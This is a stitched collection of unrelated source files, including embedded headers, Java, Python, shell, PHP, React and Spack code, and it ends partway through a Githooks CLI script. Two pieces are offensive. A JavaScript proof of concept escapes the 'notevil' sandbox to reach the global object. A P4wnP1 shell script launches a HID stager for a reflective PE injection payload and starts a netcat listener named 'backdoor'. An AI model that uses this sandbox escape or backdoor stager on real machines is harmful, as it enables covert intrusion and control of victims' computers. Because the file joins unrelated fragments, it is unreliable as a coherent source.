* limitations under the License.
*/
#ifndef __GAP_EVENTS_H__
#define __GAP_EVENTS_H__
#include "blecommon.h"
/**************************************************************************/
/*!
\brief
The base class used to abstract away the callback events that can be
triggered with the GAP.
*/
/**************************************************************************/
class GapEvents
{
public:
/******************************************************************/
/*!
\brief
Identifies GAP events generated by the radio HW when an event
callback occurs.
*/
/******************************************************************/
typedef enum gapEvent_e {
GAP_EVENT_TIMEOUT = 1, /**< Advertising timed out before a connection could be established. */
GAP_EVENT_CONNECTED = 2, /**< A connection was established with a central device. */
GAP_EVENT_DISCONNECTED = 3 /**< A connection was closed or lost with a central device. */
} gapEvent_t;
};
#endif // ifndef __GAP_EVENTS_H__
|
<gh_stars>0
package com.acgist.snail.context.exception;
/**
* <p>下载异常</p>
* <p>任务创建和下载过程中出现的异常</p>
*
* @author acgist
*/
public class DownloadException extends Exception {
private static final long serialVersionUID = 1L;
public DownloadException() {
super("下载异常");
}
/**
* @param message 错误信息
*/
public DownloadException(String message) {
super(message);
}
/**
* @param cause 原始异常
*/
public DownloadException(Throwable cause) {
super(cause);
}
/**
* @param message 错误信息
* @param cause 原始异常
*/
public DownloadException(String message, Throwable cause) {
super(message, cause);
}
}
|
from decimal import Decimal
from typing import Any, Optional
import json
def _dump_dynamodb_table(table: Any) -> Optional[str]:
if not table:
return None
items = []
for item in table.scan()['Items']:
formatted_item = {}
for key, value in item.items():
if isinstance(value, Decimal):
formatted_item[key] = float(value)
else:
formatted_item[key] = value
items.append(formatted_item)
return json.dumps(items, indent=2) |
#!/bin/sh
set -eu
cd "$(dirname "$0")/../.."
main() {
if ! command -v jpackage >/dev/null 2>&1; then
>&2 echo "jpackage: command not found"
exit 1
fi
artifact_file="${project.build.directory}/${project.build.finalName}.jar"
if [ ! -f "$artifact_file" ]; then
>&2 echo "$artifact_file: no such file"
exit 1
fi
dependency_dir="${project.build.directory}/dependency"
if [ ! -d "$dependency_dir" ]; then
>&2 echo "$dependency_dir: no such directory"
exit 1
fi
modulepath="$artifact_file$(printf ":%s" "$dependency_dir"/*.jar)"
echo "modulepath = $modulepath"
for type in pkg dmg; do
echo "Building $type"
jpackage \
--type "$type" \
--app-version "$(
echo "${project.version}" |
cut -d - -f 1 |
cut -d + -f 1 |
sed "s/^00*\.//"
)" \
--copyright "Copyright 2019-2021 Foreseeti AB <https://foreseeti.com>" \
--description "${project.description}" \
--name "${project.name}" \
--dest "${project.build.directory}" \
--vendor "${project.organization.name}" \
--add-modules "org.leadpony.joy.classic" \
--module-path "$modulepath" \
--input "${project.build.directory}/app-input" \
--module "${moduleName}/${mainClass}" \
--mac-package-identifier "${project.groupId}.${project.artifactId}" \
--mac-package-name "${project.name}" \
--license-file "${project.basedir}/LICENSE" \
--resource-dir "${project.basedir}/jpackage-resources"
done
}
main
|
#!/bin/bash
# daxul.sh
# Program to upgrade the APEX schema in the database. This is useful when
# access to the patchsets is not available (when you're not a paying Oracle
# customer).
#
# Relies on the apex installation files which comes with a java program to export
# the required workspace/app export files; Also, a library in the Oracle
# installation files, so ORACLE_HOME is expected to be set.
#
# Basically, the goal is to export all workspaces and applications; drop the apex
# schema and re run in the apex installation.
# Define exit codes
INVALID_ARGS=1
ORACLE_UNDEFINED=2
PROGRAM_UNDEFINED=3
OJDBC_UNDEFINED=4
USER_EXIT=5
while [[ $# -gt 1 ]]; do
key="$1"
case $key in
-h|--host)
DB_HOST=$2
;;
-p|--port)
DB_PORT=$2
;;
-s|--sid)
DB_SID=$2
;;
-i|--images)
IMAGE_PATH=$2
;;
-a|--apex)
APEX_PATH=$2
;;
-du|--dbauser)
SYS_USER=$2
;;
-dp|--dbapass)
SYS_PASS=$2
;;
-sp|--systempass)
SYSTEM_PASS=$2
;;
-su|--systemuser)
SYSTEM_USER=$2
;;
*)
;;
esac
shift
done
# Backup program paths/dependencies
OJDBC_PATH=lib/ojdbc5.jar
BACKUP_PROG_BASE_DIR=${APEX_PATH}/utilities
BACKUP_PROG_FULL_PATH=${BACKUP_PROG_BASE_DIR}/oracle/apex/APEXExport.class
# Get dir of this script so we can reference other scripts.
# Idea taken from: http://stackoverflow.com/a/246128/3476713
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
WORKSPACE_ID_SCRIPT=${SCRIPT_DIR}/generateWorkspaceIds.sql
WORKSPACE_ID_FILE=$(mktemp)
WORKSPACE_BACKUP_DIR=$(mktemp -d)
INSTANCE_CONFIG_BACKUP_SCRIPT=${SCRIPT_DIR}/backupInstanceConfig.sql
PRE_INSTANCE_CONFIG_FILE=$(mktemp)
POST_INSTANCE_CONFIG_FILE=$(mktemp)
RESTORE_SCRIPT=$(mktemp)
RUN_AND_EXIT_SCRIPT=${SCRIPT_DIR}/runAndExit.sql
print_usage(){
echo "daxul.sh -h <db_server> -p <db_port> -s <db_sid> -i </path/to/images> -a </path/to/apex> -du <dba_user (e.g. sys)> -dp <dba_password> -su <system user (e.g. system> -sp <system password>" >&2
}
print_debug(){
echo "HOST: ${DB_HOST}"
echo "PORT: ${DB_PORT}"
echo "SID: ${DB_SID}"
echo "SYSTEM USER: ${SYSTEM_USER}"
echo "SYSTEM PASSWORD: ${SYSTEM_PASS}"
echo "SYS USER: ${SYS_USER}"
echo "SYS PASSWORD: ${SYS_PASS}"
echo "CLASSPATH: ${CLASSPATH}"
echo "IMAGE PATH: ${IMAGE_PATH}"
echo "APEX PATH: ${APEX_PATH}"
}
# Make sure the correct number of arguments were received
if [[ -z ${DB_HOST}
|| -z ${DB_PORT}
|| -z ${DB_SID}
|| -z ${SYSTEM_USER}
|| -z ${SYSTEM_PASS}
|| -z ${SYS_USER}
|| -z ${SYS_PASS}
|| -z ${IMAGE_PATH}
|| -z ${APEX_PATH}
]]; then
echo "Wrong number of args. Expected usage: " >&2
print_usage
exit ${INVALID_ARGS}
fi
# Make sure ORACLE_HOME points to a valid path
if [[ ! -e ${ORACLE_HOME} ]]; then
echo "ORACLE_HOME is not set or points to an invalid path on this sytem. Can not continue" >&2
exit ${ORACLE_UNDEFINED}
fi
export PATH=${PATH}:${ORACLE_HOME}/bin
# The program requires Oracle JDBC drivers in the classpath. Based on my two
# example cases of Oracle installations (the XE server and my workstation)
# it seems there are two possible locations:
#
# 1. $ORACLE_HOME/jdbc/lib/ojdbc5.jar
# 2. $ORACLE_HOME/lib/ojdbc.jar
#
# By default set it to 1, but if that doesn't exist, try pointing it to 2.
if [[ -e ${ORACLE_HOME}/jdbc/${OJDBC_PATH} ]]; then
OJDBC_PATH=${ORACLE_HOME}/jdbc/${OJDBC_PATH}
elif [[ -e ${ORACLE_HOME}/${OJDBC_PATH} ]]; then
OJDBC_PATH=${ORACLE_HOME}/${OJDBC_PATH}
else
echo "Could not find ojdbc5.jar. Is Oracle properly installed?" >&2
exit ${OJDBC_UNDEFINED}
fi
# The apex path was found, but let us double check the java program is there
if [[ ! -e ${BACKUP_PROG_FULL_PATH} ]]; then
echo "Could not find the backup program at path ${BACKUP_PROG_FULL_PATH}" >&2
exit ${PROGRAM_UNDEFINED}
fi
# Error checking all done, now we need to set the classpath so it can be run
export CLASSPATH=${OJDBC_PATH}:${BACKUP_PROG_BASE_DIR}
#print_debug
# Output all workspace id's to a text file
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${WORKSPACE_ID_SCRIPT} ${WORKSPACE_ID_FILE}
# Backup instance config for later restoration
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${INSTANCE_CONFIG_BACKUP_SCRIPT} ${PRE_INSTANCE_CONFIG_FILE}
TOTAL_APP_COUNT=0
while read WID; do
echo "Workspace ID: ${WID}"
mkdir ${WORKSPACE_BACKUP_DIR}/${WID}
cd ${WORKSPACE_BACKUP_DIR}/${WID}
java oracle.apex.APEXExport -db ${DB_HOST}:${DB_PORT}:${DB_SID} -user ${SYSTEM_USER} -password ${SYSTEM_PASS} -expWorkspace -workspaceid ${WID}
java oracle.apex.APEXExport -db ${DB_HOST}:${DB_PORT}:${DB_SID} -user ${SYSTEM_USER} -password ${SYSTEM_PASS} -workspaceid ${WID}
NUM_APPS=$(ls -1 ${WORKSPACE_BACKUP_DIR}/${WID} | wc -l)
TOTAL_APP_COUNT=$(($TOTAL_APP_COUNT+$NUM_APPS))
done < ${WORKSPACE_ID_FILE}
echo "Uninstalling"
NUM_WORKSPACES=$(ls -1 ${WORKSPACE_BACKUP_DIR} | wc -l)
echo "A total of ${NUM_WORKSPACES} workspaces were backed up, and ${TOTAL_APP_COUNT} applications".
echo "You can view the backed up workspaces/applications at: ${WORKSPACE_BACKUP_DIR}"
echo "You can view the backed up instance config at: ${PRE_INSTANCE_CONFIG_FILE}"
echo "If you continue, Application Express will be completely uninstalled and then re-installed"
echo "All users in the internal workspace will not be restored"
echo "You may have to re-do some of the instance configuration"
read -p "Are you sure you want to continue?: " CONFIRM_CONTINUE
# ^^converts it to uppercase. Idea grabbed from: http://stackoverflow.com/a/2265268/3476713
if [[ ! "${CONFIRM_CONTINUE^^}" = "Y" ]] && [[ ! "${CONFIRM_CONTINUE^^}" = "YES" ]]; then
exit ${USER_EXIT}
fi
sqlplus ${SYS_USER}/${SYS_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} as sysdba @${RUN_AND_EXIT_SCRIPT} ${APEX_PATH}/apxremov.sql
echo "Uninstalling complete"
echo "Installing APEX"
# Need to change into the directory where the scripts are, since the installation
# script is referencing other scripts - but expecting them in the same current
# working directory.
cd ${APEX_PATH}
sqlplus ${SYS_USER}/${SYS_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} as sysdba @${APEX_PATH}/apexins.sql SYSAUX SYSAUX TEMP /i/
echo "Updating images"
sudo rm -rf ${IMAGE_PATH}/*
sudo cp -r ${APEX_PATH}/images/* ${IMAGE_PATH}/
echo "Image update complete"
# Restore workspaces and applications
while read WID; do
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${RUN_AND_EXIT_SCRIPT} ${WORKSPACE_BACKUP_DIR}/${WID}/w${WID}.sql
for apexApp in ${WORKSPACE_BACKUP_DIR}/${WID}/f*.sql; do
echo "Installing ${apexApp}"
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${RUN_AND_EXIT_SCRIPT} ${apexApp}
done
done < ${WORKSPACE_ID_FILE}
echo "Restoring instance configuration"
echo "begin" > ${RESTORE_SCRIPT}
while read BACKED_PROPERTY; do
IFS='=' read -ra INSTANCE_PARAM <<< "${BACKED_PROPERTY}"
# If value isn't empty, append update call to the script
if [[ ! -z ${INSTANCE_PARAM[1]//} ]]; then
echo "APEX_INSTANCE_ADMIN.SET_PARAMETER('${INSTANCE_PARAM[0]}', '${INSTANCE_PARAM[1]}');" >> ${RESTORE_SCRIPT}
fi
done < ${PRE_INSTANCE_CONFIG_FILE}
echo "end;" >> ${RESTORE_SCRIPT}
echo "/" >> ${RESTORE_SCRIPT}
echo "exit" >> ${RESTORE_SCRIPT}
# Before updating, get the current config
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${INSTANCE_CONFIG_BACKUP_SCRIPT} ${POST_INSTANCE_CONFIG_FILE}
# Now, restore settings as they were before the upgrade
sqlplus ${SYSTEM_USER}/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${RESTORE_SCRIPT}
echo "Restoration complete, script saved to ${RESTORE_SCRIPT}."
echo "You can review the instance config files at:"
echo "- Your existing settings before the upgrade: ${PRE_INSTANCE_CONFIG_FILE}"
echo "- The settings after upgrading APEX and before restoration: ${POST_INSTANCE_CONFIG_FILE}"
echo ""
echo "Post upgrade tasks:"
echo "- Reset the instance admin password: sqlplus system/${SYSTEM_PASS}@//${DB_HOST}:${DB_PORT}/${DB_SID} @${APEX_PATH}/apxchpwd.sql"
echo "- Restart the web container (e.g. sudo systemctl restart tomcat)"
|
install_node_modules() {
local build_dir=${1:-}
if [ -e $build_dir/package.json ]; then
cd $build_dir
echo "Pruning any extraneous modules"
npm prune --unsafe-perm --userconfig $build_dir/.npmrc 2>&1
if [ -e $build_dir/npm-shrinkwrap.json ]; then
echo "Installing node modules (package.json + shrinkwrap)"
else
echo "Installing node modules (package.json)"
fi
npm install --unsafe-perm --userconfig $build_dir/.npmrc 2>&1
else
echo "Skipping (no package.json)"
fi
}
rebuild_node_modules() {
local build_dir=${1:-}
if [ -e $build_dir/package.json ]; then
cd $build_dir
echo "Rebuilding any native modules"
npm rebuild 2>&1
if [ -e $build_dir/npm-shrinkwrap.json ]; then
echo "Installing any new modules (package.json + shrinkwrap)"
else
echo "Installing any new modules (package.json)"
fi
npm install --unsafe-perm --userconfig $build_dir/.npmrc 2>&1
else
echo "Skipping (no package.json)"
fi
}
BP_DIR=$(cd $(dirname ${0:-}); cd ..; pwd)
get_file_initial() {
local FILE_NAME=$(python -c 'import json,sys; f = open("package.json","r"); obj = json.load(f);print obj["scripts"]["start"].split()[1]; f.close()')
echo $FILE_NAME
}
update_server_appd() {
local build_dir=${1:-}
LEN=$(echo ${#VCAP_SERVICES})
if [ $LEN -ge 4 ]; then
echo "Reading Environment Variables for Appdynamics"
local INIT_FILE=$(get_file_initial)
python $BP_DIR/extensions/appdynamics/extension_appdy.py $build_dir
local TEST_DATA=$(cat /tmp/_appd_module.txt)
echo $TEST_DATA | cat - $build_dir/$INIT_FILE > /tmp/_server.js && mv /tmp/_server.js $build_dir/$INIT_FILE
fi
}
|
var safeEval = require('notevil')
var input = "" +
"function fn() {};" +
"var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" +
"var properties = Object.values(constructorProperty);" +
"properties.pop();" +
"properties.pop();" +
"properties.pop();" +
"var Function = properties.pop();" +
"(Function('return this'))()";
console.log(safeEval(input))
|
python3 exps/node2vec_exp.py --config-file './configs/yamls/node2vec_baseline.yaml' |
#!/bin/bash
# Script that builds androidx SNAPSHOT and runs the androidx integration
# tests from the Studio branch.
set -e
readonly SCRIPT_PATH="$(dirname $(realpath "$0"))"
readonly BASE_PATH="$(realpath "$SCRIPT_PATH/../../..")"
readonly PREBUILTS_DIR="$BASE_PATH/prebuilts"
readonly OUT_DIR="$BASE_PATH/out"
readonly BAZEL_CMD="$BASE_PATH/tools/base/bazel/bazel"
readonly M2REPO_DIR="$PREBUILTS_DIR/tools/common/androidx-integration/m2repository"
readonly ANDROIDX_INTERNAL_DIR="$PREBUILTS_DIR/androidx/internal"
echo "Using basepath $BASE_PATH"
echo "Starting $0 at $(date)"
$SCRIPT_PATH/androidx_snapshot.sh
mkdir -p $M2REPO_DIR
# Copy internal and the output to prebuilts/tools/common/androidx-integration
cp -R $ANDROIDX_INTERNAL_DIR/* $M2REPO_DIR
unzip -quo $OUT_DIR/dist/top-of-tree-m2repository-all-*.zip -d $M2REPO_DIR/..
$BAZEL_CMD test //tools/adt/idea/androidx-integration-tests:intellij.android.androidx-integration-tests
echo "Completing $0 at $(date)"
|
<?php
class HttpResponse {
public function isOk() {
// Assuming $this->statusCode contains the HTTP status code
return $this->statusCode === 200;
}
public function formatTaskData($data) {
$formattedStatus = $data['status'] == 1 ? ' (Active)' : '';
return "Task: {$data['title']}, Status: {$data['status']}{$formattedStatus}";
}
}
$response = new HttpResponse();
// Check if the response is okay
if($response->isOk()){
// do whatever you want
}
$data = [
'title'=>'Task No 1',
'status'=>1
];
// Format task data
$formattedData = $response->formatTaskData($data);
echo $formattedData;
?> |
/*=========================================================================
Program: ParaView
Module: PrismScaleViewDialog.h
=========================================================================*/
#ifndef __PrismScaleViewDialog_h
#define __PrismScaleViewDialog_h
#include <QDialog>
#include <QString>
class PrismView;
class QAbstractButton;
class QCloseEvent;
class PrismScaleViewDialog : public QDialog
{
Q_OBJECT
typedef QDialog Superclass;
public:
PrismScaleViewDialog(QWidget* parent=0, Qt::WindowFlags flags=0);
virtual ~PrismScaleViewDialog();
void setView(PrismView* view);
public slots:
void show();
protected slots:
void onModeChanged(const QString& mode);
void onCustomBoundsChanged();
void onButtonClicked(QAbstractButton * button);
protected:
bool hasCustomBounds() const;
void modeChanged(const int& pos, const int& value);
void setupViewInfo();
void updateView();
//needed to handle saving the dialog position on screen
virtual void closeEvent( QCloseEvent* cevent);
void saveWindowPosition();
private:
class pqInternals;
pqInternals *Internals;
PrismView *View;
};
#endif
|
<filename>pycval/__main__.py
import hashlib
import logging
import sys
from .pycval import checksum, validate
base_logger = logging.getLogger(__name__)
stream_handler = logging.StreamHandler()
stream_formatter = logging.Formatter(
'%(asctime)s - %(levelname)s: %(name)s - %(message)s'
)
stream_handler.setFormatter(stream_formatter)
base_logger.addHandler(stream_handler)
if __name__ == '__main__':
import argparse
import os
base_logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description='Checksum validator')
hash_algorithms = list(hashlib.algorithms_guaranteed)
common_args = argparse.ArgumentParser(add_help=False)
common_args.add_argument(
'input',
nargs='?',
help='Source input. This can be a file, a string or stdin',
default=sys.stdin
)
common_args.add_argument(
'-a',
'--algorithm',
choices=hash_algorithms,
help='Hash algorithm. Possible values: ' + ', '.join(hash_algorithms),
metavar='',
required=True
)
common_args.add_argument(
'--debug',
help='Turn on debugging output',
action='store_true',
default=False
)
subparsers = parser.add_subparsers(description='Method to use', dest='cmd')
checksum_arg = subparsers.add_parser('checksum', parents=[common_args])
checksum_arg.set_defaults(func=checksum)
checksum_arg.add_argument(
'-d',
'--dump',
help='Dump hash to disk',
action='store_true'
)
validate_arg = subparsers.add_parser('validate', parents=[common_args])
validate_arg.set_defaults(func=validate)
validate_arg.add_argument(
'-f',
'--file',
help='Check file'
)
validate_arg.add_argument(
'-s',
'--string',
help='Check string'
)
args = parser.parse_args()
base_logger.setLevel(logging.DEBUG if args.debug else logging.WARNING)
base_logger.debug(f'args = {args}')
def detect_input(inp):
"""Check if inp is a file, stdin or just a string"""
_inp = {k: None for k in ['file', 'string', 'stdin']}
try:
inp.isatty()
_inp['stdin'] = inp.read()
return _inp
except AttributeError:
try:
if not (os.path.exists(inp) and os.path.isfile(inp)):
raise FileNotFoundError
_inp['file'] = inp
return _inp
except FileNotFoundError:
_inp['string'] = inp
return _inp
inp = detect_input(args.input)
base_logger.debug(f'inp = {inp}')
as_string = False
if inp.get('stdin') or inp.get('string'):
as_string = True
if args.cmd == 'checksum':
_checksum = args.func(
*[i for i in inp.values() if i],
args.algorithm,
as_string
)
if args.dump:
with open('pycval_output.' + str(args.algorithm), 'w') as out:
out.write(str(_checksum))
else:
print(_checksum)
elif args.cmd == 'validate':
_validate = args.func(
*[i for i in inp.values() if i],
args.algorithm,
csum_file=args.file,
csum_string=args.string,
as_string=as_string
)
print(_validate)
|
import numpy as np
from deepthought.experiments.encoding.experiment_templates.base import NestedCVExperimentTemplate
class SVCBaseline(NestedCVExperimentTemplate):
def pretrain_encoder(self, *args, **kwargs):
def dummy_encoder_fn(indices):
if type(indices) == np.ndarray:
indices = indices.tolist() # ndarray is not supported as indices
# read the chunk of data for the given indices
state = self.full_hdf5.open()
data = self.full_hdf5.get_data(request=indices, state=state)
self.full_hdf5.close(state)
# get only the features source
source_idx = self.full_hdf5.sources.index('features')
data = np.ascontiguousarray(data[source_idx])
# apply optional channel mean
if self.hyper_params['ch_mean'] is True:
data = data.mean(axis=1) # bc01 format -> will result in b01 format
return data
return dummy_encoder_fn
def run(self, verbose=False):
from deepthought.experiments.encoding.classifiers.linear_svc import LinearSVCClassifierFactory
super(SVCBaseline, self).run(classifiers=(('linear_svc', LinearSVCClassifierFactory()),), verbose=verbose)
|
<gh_stars>0
import React, {Component} from "react"
import logoFuji from '../../include/img/fujioka-logo.png';
class NavBar extends Component{
render(){
return (
<nav className="navbar navbar-expand-lg navbar-light bg-light">
<a className="navbar-brand"
href="#logo"
rel="noopener noreferrer" >
<img src={logoFuji} alt="<NAME>" width="100" height="100"/>
</a>
<button className="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<span className="navbar-toggler-icon"></span>
</button>
<div className="collapse navbar-collapse" id="navbarSupportedContent">
<ul className="navbar-nav mr-auto">
<li className="nav-item active">
// Veja o problema que será relatado no console, para corrigir adicione na tag da sequência rel="noopener noreferrer"
<a className="nav-link"
href="https://github.com/professorfujioka/lab-react"
target="_blank"
>Instruções
<span class="sr-only">(current)
</span>
</a>
</li>
<li className="nav-item">
<a className="nav-link"
href="https://www.wscom.com.br/docente-de-ti-do-unipe-ministra-palestra-na-expotec-2017"
target="_blank" rel="noopener noreferrer" >Docker
</a>
</li>
<li className="nav-item dropdown">
<a className="nav-link dropdown-toggle"
href="#"
rel="noopener noreferrer"
id="navbarDropdown"
ole="button"
ata-toggle="dropdown"
aria-haspopup="true"
aria-expanded="false">
Produto
</a>
<div className="dropdown-menu" aria-labelledby="navbarDropdown">
<a className="dropdown-item" href="#cadastro">Cadastrar</a>
<a className="dropdown-item" href="#alteracao">Alterar</a>
<div className="dropdown-divider"></div>
<a className="dropdown-item" href="#listar">Listar</a>
</div>
</li>
</ul>
<form className="form-inline my-2 my-lg-0">
<input className="form-control mr-sm-2" type="search" placeholder="Search" aria-label="Search"></input>
<button className="btn btn-outline-success my-2 my-sm-0" type="submit">Busca</button>
</form>
</div>
</nav>
)
}
}
export default NavBar; |
#!/bin/bash
hidraw=$(P4wnP1_cli usb get device raw)
if [ "$hidraw" = "" ]; then
echo "[!] No raw HID device found, aborting";
exit
fi
if [ ! -f /usr/local/P4wnP1/legacy/Stage2.ps1 ]; then
echo "[!] Stage2.ps1 not found, Use StageGenerator.py to generate it!"
exit
fi
echo "[*] Kill old hidstager processes..."
ps -aux | grep hidstager.py | grep -v grep | awk {'system("kill "$2)'}
echo "[*] Starting HID stager for Reflective PE Injection covert channel payload..."
python /usr/local/P4wnP1/legacy/hidstager.py -s -i /usr/local/P4wnP1/legacy/Stage2.ps1 -o $hidraw &
P4wnP1_cli hid run -n Stage1.js > /dev.null
if ! ps -aux | grep netcat | grep -q -v grep; then
echo "[*] Start backdoor covert channel server and attach to screen session..."
screen -dmS backdoor bash -c "netcat -lvp 4444"
echo "[+] Type \"screen -d -r backdoor\" to switch to backdoor cli"
else
echo "[!] HID covert channel server already running"
fi
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by <NAME>, <EMAIL>, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Phasta(CMakePackage):
"""SCOREC RPI's Parallel Hierarchic Adaptive Stabilized Transient Analysis
(PHASTA) of compressible and incompressible Navier Stokes equations."""
homepage = "https://www.scorec.rpi.edu/software.php"
url = "https://github.com/PHASTA/phasta.git"
version('0.0.1', git='https://github.com/PHASTA/phasta.git',
commit='11f431f2d1a53a529dab4b0f079ab8aab7ca1109')
version('develop', git='https://github.com/PHASTA/phasta.git',
branch='master')
depends_on('mpi')
def cmake_args(self):
spec = self.spec
args = [
'-DPHASTA_USE_MPI=ON',
'-DPHASTA_BUILD_CONVERTERIO=OFF',
'-DPHASTA_BUILD_ACUSTAT=OFF',
'-DPHASTA_BUILD_M2N=OFF',
'-DPHASTA_BUILD_M2NFixBnd=OFF',
'-DPHASTA_USE_LESLIB=OFF',
'-DPHASTA_USE_PETSC=OFF',
'-DPHASTA_USE_SVLS=ON',
'-DPHASTA_INCOMPRESSIBLE=ON',
'-DPHASTA_COMPRESSIBLE=ON',
'-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
'-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
'-DCMAKE_Fortran_COMPILER=%s' % spec['mpi'].mpifc,
]
return args
|
#!/bin/sh
#
# Command line helper for https://github.com/rycus86/githooks
#
# This tool provides a convenience utility to manage
# Githooks configuration, hook files and other
# related functionality.
# This script should be an alias for `git hooks`, done by
# git config --global alias.hooks "!${SCRIPT_DIR}/githooks"
#
# See the documentation in the project README for more information,
# or run the `git hooks help` command for available options.
#
# Legacy version number. Not used anymore, but old installs read it.
# Version: 9912.310000-000000
#####################################################
# Prints the command line help for usage and
# available commands.
#####################################################
print_help() {
print_help_header
echo "
Available commands:
disable Disables a hook in the current repository
enable Enables a previously disabled hook in the current repository
accept Accepts the pending changes of a new or modified hook
trust Manages settings related to trusted repositories
list Lists the active hooks in the current repository
shared Manages the shared hook repositories
install Installs the latest Githooks hooks
uninstall Uninstalls the Githooks hooks
update Performs an update check
readme Manages the Githooks README in the current repository
ignore Manages Githooks ignore files in the current repository
config Manages various Githooks configuration
tools Manages script folders for tools
version Prints the version number of this script
help Prints this help message
You can also execute \`git hooks <cmd> help\` for more information on the individual commands.
"
}
#####################################################
# Prints a general header to be included
# as the first few lines of every help message.
#####################################################
print_help_header() {
echo
echo "Githooks - https://github.com/rycus86/githooks"
echo "----------------------------------------------"
}
#####################################################
# Sets the ${INSTALL_DIR} variable.
#
# Returns: None
#####################################################
load_install_dir() {
INSTALL_DIR=$(git config --global --get githooks.installDir)
if [ -z "${INSTALL_DIR}" ]; then
# install dir not defined, use default
INSTALL_DIR=~/".githooks"
elif [ ! -d "$INSTALL_DIR" ]; then
echo "! Githooks installation is corrupt! " >&2
echo " Install directory at ${INSTALL_DIR} is missing." >&2
INSTALL_DIR=~/".githooks"
echo " Falling back to default directory at ${INSTALL_DIR}" >&2
echo " Please run the Githooks install script again to fix it." >&2
fi
GITHOOKS_CLONE_DIR="$INSTALL_DIR/release"
}
#####################################################
# Set up the main variables that
# we will throughout the hook.
#
# Sets the ${CURRENT_GIT_DIR} variable
#
# Returns: None
#####################################################
set_main_variables() {
CURRENT_GIT_DIR=$(git rev-parse --git-common-dir 2>/dev/null)
if [ "${CURRENT_GIT_DIR}" = "--git-common-dir" ]; then
CURRENT_GIT_DIR=".git"
fi
load_install_dir
# Global IFS for loops
IFS_NEWLINE="
"
}
#####################################################
# Checks if the current directory is
# a Git repository or not.
# Returns:
# 0 if it is likely a Git repository,
# 1 otherwise
#####################################################
is_running_in_git_repo_root() {
git rev-parse >/dev/null 2>&1 || return 1
[ -d "${CURRENT_GIT_DIR}" ] || return 1
}
#####################################################
# Echo if the current repository is non-bare.
#
# Returns: 0
#####################################################
echo_if_non_bare_repo() {
if [ "$(git rev-parse --is-bare-repository 2>/dev/null)" = "false" ]; then
echo "$@"
fi
return 0
}
#####################################################
# Finds a hook file path based on trigger name,
# file name, relative or absolute path, or
# some combination of these.
#
# Sets the ${HOOK_PATH} environment variable.
#
# Returns:
# 0 on success, 1 when no hooks found
#####################################################
find_hook_path_to_enable_or_disable() {
if [ "$1" = "--shared" ]; then
shift
if [ -z "$1" ]; then
echo "! For shared repositories, either the trigger type" >&2
echo " the hook name or both needs to be given" >&2
return 1
fi
if [ ! -d "$INSTALL_DIR/shared" ]; then
echo "! No shared repositories found" >&2
return 1
fi
IFS="$IFS_NEWLINE"
for SHARED_ROOT in "$INSTALL_DIR/shared/"*; do
unset IFS
if [ ! -d "$SHARED_ROOT" ]; then
continue
fi
REMOTE_URL=$(git -C "$SHARED_ROOT" config --get remote.origin.url)
SHARED_LOCAL_REPOS_LIST=$(grep -E "^[^#\n\r ].*$" <"$(pwd)/.githooks/.shared")
ACTIVE_LOCAL_REPO=$(echo "$SHARED_LOCAL_REPOS_LIST" | grep -F -o "$REMOTE_URL")
ACTIVE_GLOBAL_REPO=$(git config --global --get-all githooks.shared | grep -o "$REMOTE_URL")
if [ "$ACTIVE_LOCAL_REPO" != "$REMOTE_URL" ] && [ "$ACTIVE_GLOBAL_REPO" != "$REMOTE_URL" ]; then
continue
fi
if [ -n "$1" ] && [ -n "$2" ]; then
if [ -f "$SHARED_ROOT/.githooks/$1/$2" ]; then
HOOK_PATH="$SHARED_ROOT/.githooks/$1/$2"
return
elif [ -f "$SHARED_ROOT/$1/$2" ]; then
HOOK_PATH="$SHARED_ROOT/$1/$2"
return
fi
elif [ -d "$SHARED_ROOT/.githooks" ]; then
HOOK_PATH=$(find "$SHARED_ROOT/.githooks" -name "$1" | head -1)
[ -n "$HOOK_PATH" ] && return 0 || return 1
else
HOOK_PATH=$(find "$SHARED_ROOT" -name "$1" | head -1)
[ -n "$HOOK_PATH" ] && return 0 || return 1
fi
IFS="$IFS_NEWLINE"
done
echo "! Sorry, cannot find any shared hooks that would match that" >&2
return 1
fi
if [ -z "$1" ]; then
HOOK_PATH=$(cd .githooks && pwd)
elif [ -n "$1" ] && [ -n "$2" ]; then
HOOK_TARGET="$(pwd)/.githooks/$1/$2"
if [ -e "$HOOK_TARGET" ]; then
HOOK_PATH="$HOOK_TARGET"
fi
elif [ -n "$1" ]; then
if [ -e "$1" ]; then
HOOK_DIR=$(dirname "$1")
HOOK_NAME=$(basename "$1")
if [ "$HOOK_NAME" = "." ]; then
HOOK_PATH=$(cd "$HOOK_DIR" && pwd)
else
